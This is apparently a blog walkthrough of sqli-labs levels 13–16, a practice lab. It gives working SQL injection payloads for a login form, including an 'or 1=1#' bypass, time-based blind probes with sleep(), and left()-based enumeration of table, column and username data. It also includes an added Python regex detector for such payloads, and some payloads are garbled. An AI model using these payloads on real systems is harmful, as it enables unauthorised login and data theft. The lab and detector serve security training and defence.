sql-lab: clearing levels 13-16

LESS13
After some trying we found that, unlike level 12, level 13 has no echo: it only shows whether the login succeeded.
Level 12 echoes the result:

 

Level 13 only shows the login prompt:

 

Then capture the packet with Burp; I will not demonstrate that this time.
uname=admin'&passwd=admin&submit=Submit
Next we construct the injection statement.
Determine the parameter wrapping format by trying each of these:
'
')
'))
"
")
"))
Input: uname=n') or 1=1#&passwd=admin&submit=Submit. We can see the login succeeds (not shown here), so the wrapping format is the second one.



 

Next we guess the number of columns.
Input: uname=n') order by 2#&passwd=admin&submit=Submit

 

 


Because there is no echo, we use Boolean-based or time-based blind injection.

Input: uname=n') or if(length(database())=8,1,sleep(5))#&passwd=admin&submit=Submit
The if and length functions used in this statement were explained in an earlier article.
This judges the length of the database name: if the length is 8 the page loads immediately, otherwise it loads after 5 s. Narrow the length down with > and < by bisection; here I go straight to the demo rather than spend time on that.
You can see from the response time that the database name has length 8.

 

Next we use the left function to guess exactly what the database name is.
Input: uname=n') or left(database(),1)='a'#&passwd=admin&submit=Submit
Here I guess that the first letter is a; the page shows failure. We can change the number 1 to guess the letter at a different position.
I skip the rest; the database name is security.
Note: instead of = we can also use >. For example, guess >'a': if it returns 1, the first letter is greater than a, i.e. a letter after a.

 

Querying the tables:
Input: uname=n') or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='e'#&passwd=admin&submit=Submit

 

 

 

In the MySQL command line, if we enter the security database, the first table is emails, so the guess shows success.

This method is quite slow; Burp Intruder is recommended instead.
Capture the packet with Burp and send it to the Intruder module, clear the positions, then select the a and add it as a payload position, and start the attack.

 

 

 

Start the attack; the correct data can be identified by the length of the returned response.

LESS14
Level 14 is exactly the same as level 13, except that the data is wrapped in ""; the steps are identical, refer to the above.

LESS15

Level 15 is also the same as the previous two levels, except that the data is wrapped in ''; the steps are identical, refer to the above.

Here are the step payloads (really the same as above):

1. uname=admin&passwd=a"&submit=Submit, construct: 1' or 1=1#. Judging the number of columns has no real meaning here.

2. uname=adminadmin&passwd=admiand' or if(length(database())>1000,1,sleep(5))#&submit=Submit, use this to judge the length.

3. uname=adminadmin&passwd=admiand' or if(length()>1000,1,sleep(5))#&submit=Submit

4. uname=adminadmin&passwd=admiand' or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&submit=Submit, judged with the same method as less-13; this tells whether the first letter of the first table in the security database is greater than a.

5. uname=adminadmin&passwd=admiand' or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)>'g'#&submit=Submit, the same method tells whether the column name in the users table is greater than g.

6. uname=adminadmin&passwd=admiand' or left((select username from security.users limit 0,1),1)>'a'#&submit=Submit, use this to judge the first character of the first username under security.users. You cannot query select username,password together here; they have to be queried one at a time.
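The payloads in these steps all share a few server-side signatures (a quote or parenthesis breakout followed by or, a trailing comment, sleep()/if()/left() probes, information_schema lookups). As an added example that is not part of the original post or of sqli-labs, the Python below applies those signatures to constructed POST bodies modelled on this write-up, the kind of check a WAF rule or log review would run.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies: two benign logins plus payloads modelled on
# the ones in this write-up (they are not captured traffic).
SAMPLE_REQUESTS = [
    "uname=admin&passwd=admin&submit=Submit",
    "uname=n') or 1=1 #&passwd=admin&submit=Submit",
    "uname=n') or if(length(database())=8,1,sleep(5))#&passwd=admin&submit=Submit",
    "uname=n') or left((select table_name from information_schema.tables "
    "where table_schema='security' limit 0,1),1)='e'#&passwd=admin&submit=Submit",
    "uname=o'brien&passwd=Summer2024!&submit=Submit",   # apostrophe, but benign
]

# (rule name, regex). Rule names are my own labels, not a standard taxonomy.
RULES = [
    ("breakout_or", re.compile(r"""['"]\)*\s*(or|and)\b""", re.I)),   # ') or / " and
    ("comment_tail", re.compile(r"(#|--\s|/\*)\s*$")),               # trailing comment
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),   # time-based blind
    ("boolean_probe", re.compile(r"\b(if|left|substr|substring|ascii|length)\s*\(", re.I)),
    ("schema_enum", re.compile(r"information_schema\.|\bdatabase\s*\(", re.I)),
]


def scan_request(body):
    """Return {field: [rule names]} for every form field that matches a rule."""
    hits = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            matched = [name for name, rx in RULES if rx.search(value)]
            if matched:
                hits.setdefault(field, []).extend(matched)
    return hits


def classify(body):
    """'injection' for a blind probe / schema lookup, or breakout + comment together;
    'suspicious' for a single isolated hit (e.g. a lone '#'); else 'benign'."""
    names = {n for rules in scan_request(body).values() for n in rules}
    strong = {"time_based", "boolean_probe", "schema_enum"}
    if names & strong or {"breakout_or", "comment_tail"} <= names:
        return "injection"
    return "suspicious" if names else "benign"


if __name__ == "__main__":
    for body in SAMPLE_REQUESTS:
        print(f"{classify(body):10s} {scan_request(body)}  <- {body[:60]}")
```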


LESS16

Level 16 is also the same as the previous levels, except that the data is wrapped in (""); the steps are identical, refer to the above.


Origin: www.cnblogs.com/c1047509362/p/12392314.html